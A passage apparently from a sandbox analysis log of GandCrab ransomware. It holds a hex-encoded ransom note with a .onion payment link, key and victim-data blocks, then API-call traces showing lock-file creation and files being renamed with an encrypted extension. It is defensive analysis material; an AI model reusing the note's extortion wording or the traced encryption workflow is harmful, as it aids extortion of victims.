x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0072.240] WriteFile (in: hFile=0x2d4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e590, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e590*=0x2162, lpOverlapped=0x0) returned 1 [0072.241] CloseHandle (hObject=0x2d4) returned 1 [0072.241] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.241] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.242] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x11, wMilliseconds=0x22f)) [0072.242] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.242] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.242] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.243] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\d2ca4a09d2ca4deb61a.lock") returned 123 [0072.243] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2d4 [0072.244] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.244] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.244] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned 99 [0072.244] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*" [0072.244] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", fInfoLevelId=0x1, lpFindFileData=0x259e5ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e5ac) returned 0x5032f8 [0072.245] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.245] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0072.245] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.245] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.245] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0072.245] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.245] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.245] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\d2ca4a09d2ca4deb61a.lock" [0072.245] lstrlenW (lpString=".titwmvjl") returned 9 [0072.245] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\d2ca4a09d2ca4deb61a.lock") returned 123 [0072.245] VirtualAlloc (lpAddress=0x0, dwSize=0x136, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.245] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 132 [0072.245] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\d2ca4a09d2ca4deb61a.lock") returned 123 [0072.245] lstrlenW (lpString=".lock") returned 5 [0072.245] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.246] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.246] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.246] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.246] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0072.246] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0072.246] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0072.246] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" [0072.246] lstrlenW (lpString=".titwmvjl") returned 9 [0072.246] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 110 [0072.246] VirtualAlloc (lpAddress=0x0, dwSize=0x11c, 